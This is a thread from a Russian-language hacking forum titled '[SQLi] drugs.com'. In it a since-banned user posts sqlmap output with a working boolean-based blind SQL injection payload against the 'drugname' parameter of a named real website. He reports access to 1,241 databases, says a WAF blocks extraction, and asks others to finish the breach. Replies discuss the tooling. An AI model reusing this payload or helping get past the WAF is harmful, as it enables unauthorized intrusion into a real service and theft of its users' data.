• XSS.stack #1 – первый литературный журнал от юзеров форума

[SQLi] drugs.com

Xrenovi4

Скидди
Забанен
Регистрация
02.10.2018
Сообщения
197
Реакции
465
Пожалуйста, обратите внимание, что пользователь заблокирован
У вас должно быть более 10 сообщений для просмотра скрытого контента.

Parameter: drugname (GET)
Type: boolean-based blind
Title: MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)
Payload: drugname=-8360' OR (6959=6959)*8423-- vyEr
---
back-end DBMS: MySQL unknown

1241 дб, но получить имена не вышло, ответы все убивает waf


Если кто крутанет, был бы рад услышать как решили проблему с именами
 
Последнее редактирование:
Хренович, это тулзой нашел?
https://xss.pro/threads/30638/
или свои методы?
Просто тут на грани выбора, подмоги старичек.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Хренович, это тулзой нашел?
https://xss.pro/threads/30638/
или свои методы?
Просто тут на грани выбора, подмоги старичек.
Нашел то да, но крутил уже потом мапом
На общих настройках до бд не добраться, сайт спецефичненький
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх